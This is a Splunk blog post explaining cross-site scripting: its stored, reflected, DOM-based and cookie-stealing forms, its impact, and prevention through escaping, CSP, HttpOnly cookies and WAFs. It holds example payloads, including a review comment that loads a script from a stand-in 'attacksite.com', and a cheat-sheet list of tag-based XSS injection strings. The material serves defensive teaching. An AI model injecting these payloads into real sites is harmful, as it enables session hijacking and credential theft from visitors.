Cross-site scripting (XSS) attacks are bad news. And they can affect lots of people, often unknowingly. Chief among the top cybersecurity threats affecting users worldwide, any website with unsafe elements can become vulnerable to XSS attacks — making visitors to that website unwitting cyberattack victims.
To secure your website from XSS attacks, you must first know what they are. This post explains important information about XSS attacks, including how they work, their impact, types of XSS attacks, and, crucially, what you can do to prevent them.
An XSS attack is a common cyberattack in which attackers use vulnerabilities in trusted websites to inject malicious scripts — commonly a client-side JavaScript code — and execute that code in the browsers of users who visit the website. Though the host includes the malicious code, XSS targets the visitors to the injected website.
Let’s see what an XSS attack looks like in practice.
Imagine you’re browsing a well-established news site, like the BBC or The Wall Street Journal. Because your browser trusts the website — it’s established and has the appropriate credentials — your browser can't verify the legitimacy of any additional script an attacker may have injected. This enables the malicious script to perform unauthorized (often unknowable) actions on your browser, like:
In this process, the attacker bypasses the browser’s origin policy and uses malicious code to attack readers of the website.
(Related reading: website performance monitoring & security monitoring.)
XSS exploits vulnerabilities in your web pages and websites. When the same-origin policy is not properly implemented on a webpage, it allows attackers to inject malicious scripts from anywhere. Here are the general steps of an XSS attack, from its craft to total compromise:
There are at least four types of XSS attacks. Let’s look at each.
In a stored or persistent XSS attack, the attacker permanently stores malicious scripts in the target website, such as user review forms, message boards, or social networks. These scripts are then executed whenever a user accesses the compromised content.
For example, on a retail website with a vulnerable feedback form, an attacker could post a review containing a malicious script:
The product was great and worth the price <script src=”http://attacksite.com/stealUserAuth.js”></script>
This script steals authentication data when users view the feedback, allowing the attacker to access sensitive user information like session cookies and credit card details.
Reflected XSS attacks occur when malicious scripts are reflected off a web server, typically through vulnerable input fields like search forms. These attacks are non-persistent and only execute when the malicious link is clicked by a user.
For instance, an attacker finds a vulnerable website and injects a script into the search query. The server reflects this script to the user. The attacker then crafts a malicious link with the script embedded and distributes it via email or social media. When an unsuspecting user clicks the link, the malicious script executes in their browser.
DOM-based XSS attacks exploit client-side JavaScript vulnerabilities by injecting malicious scripts into the Document Object Model (DOM). These attacks occur when a website processes and writes unstructured data directly from the URL or other client-side input back into the web page.
For example, if a website displays a user's name from the URL, such as http://website.com/index.html?name=Mary, an attacker can craft a malicious link like so:
http://website.com/index.html?name=<script>alert(document.cookie)</script>
When an unsuspecting user clicks this link, the browser executes the malicious script, compromising the user's session by displaying their cookies through the alert function.
A cookie grabber attack targets session cookies, which store sensitive information like login credentials.
By exploiting vulnerabilities in a website, attackers can inject code to steal these cookies, gaining unauthorized access to user accounts.
For example, an attacker might inject malicious code into a website’s comment section. When a user visits the compromised page, the code sends the user's cookies to the attacker's server. This allows the attacker to hijack the user's session and access their account without permission.
Now that we know how they work, we can start to see the consequences of XSS attacks. Based on the attack type, the users, and the types of data targeted by attackers, XSS attacks can have several different consequences.
Here are some possible damages of XSS attacks on your organization:
You can check that your website has weak points that expose you to XSS attacks in two ways — manually checking via payloads or using an automated approach.
(Stay relevant on threat actors with security events to attend and security articles to read.)
Following are the common HTML tags and their attributes used to insert malicious code and carry out cross-site scripting attacks:
x<script src=http://website.com/stealUserAuth.js></script>
<script> alert("XSS");</script>
<img src="javascript:alert("XSS");">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
<img src=”test” onerror=alert("XSS")>
<input type="image" src="javascript:alert('XSS');">
<body background="javascript:alert("XSS")">
<object type="text/x-scriptlet" data="http://website.com/test.html">
<iframe src="http://website.com/test.htm">
<div style="background-image: url(javascript:alert('XSS'))">
<link rel="stylesheet" href="javascript:alert('XSS');">
XSS attacks are bad news. Preparing for them is possible, particularly by minimizing vulnerabilities. Here are the proper security techniques to use to prevent XSS attacks:
Sanitize outputs properly. Depending on the user input, use a suitable escaping technique like HTML escape, CSS escape, JavaScript escape, URL escape, etc. Use a trusted and verified library to escape HTML inputs.
Input validation. For example, validate URLs containing safe protocols like HTTP and HTTPS, validate numerics to ensure the input does not contain unnecessary characters, etc.
Enforce the Content Security Policy (CSP). This policy allows users to only load client-side resources, such as JavaScript and CSS, from trusted sources.
Set the HttpOnly flag. You can set this flag in the cookies to prevent JavaScript code from accessing the cookies.
Use the X-XSS-Protection header. Set this in browsers like Google Chrome and Microsoft Edge to prevent reflected XSS attacks.
Implement Web Application Firewalls. WAFs can check for specific attack strings and block them.
The defense-in-depth principle involves implementing multiple layers of security mechanisms to protect against various types of attacks. In the context of web applications, this means deploying security measures at different levels — network, application, host, and data—to create overlapping layers of defense.
By employing diverse security controls such as firewalls, encryption, access controls, and regular security assessments, organizations can mitigate the risk of XSS and other vulnerabilities more effectively.
OWASP's XSS Prevention Cheat Sheet provides comprehensive guidance and best practices for developers to prevent XSS vulnerabilities in web applications. It includes detailed recommendations on:
By following OWASP's guidelines, developers can implement robust defenses against XSS attacks, ensuring that user inputs are properly sanitized and malicious scripts are effectively mitigated.
XSS attacks are injection-type attacks where attackers inject malicious scripts into web browsers and compromise legitimate user accounts to perform various malicious activities. Three XSS attacks differ in how the malicious script is stored, delivered, and executed. XSS attacks can have severe consequences for both the users and the website, including:
Cybersecurity protocols and ongoing cyber hygiene support the necessary security measurements discussed in this article to prevent and reduce the risks of XSS attacks — and help businesses stay resilient.
See an error or have a suggestion? Please let us know by emailing ssg-blogs@splunk.com.
This posting does not necessarily represent Splunk's position, strategies or opinion.
The Splunk platform removes the barriers between data and action, empowering observability, IT and security teams to ensure their organizations are secure, resilient and innovative.
Founded in 2003, Splunk is a global company — with over 7,500 employees, Splunkers have received over 1,020 patents to date and availability in 21 regions around the world — and offers an open, extensible data platform that supports shared data across any environment so that all teams in an organization can get end-to-end visibility, with context, for every interaction and business process. Build a strong data foundation with Splunk.